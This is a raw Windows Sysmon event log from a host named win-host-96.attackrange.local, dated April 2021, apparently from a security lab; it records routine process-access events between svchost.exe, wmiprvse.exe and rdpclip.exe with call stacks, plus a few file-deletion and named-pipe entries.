12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292329Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292328Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292327Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292326Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292325Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292324Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292323Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292322Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.363{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A2F56BEC35410BE9A942525C453AF3,SHA256=35554D744E43B7129623A29C84DB4DDCE67F8F1CD3753468040797CF790B2D85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292321Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.357{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292320Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.357{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292319Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292318Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292317Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292316Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000292315Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292314Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292313Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292312Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292311Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292310Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D4AF-6086-5601-00000000BB01}436WIN-HOST-96\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpgMD5=F33442D9BB8F8BFDBE2C8315132603B2,SHA256=399816D8F71681E02B635293583D0D74EC6DD6017C1BBC70E865A7558050A09C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292309Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292308Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292307Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292306Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292305Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292304Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 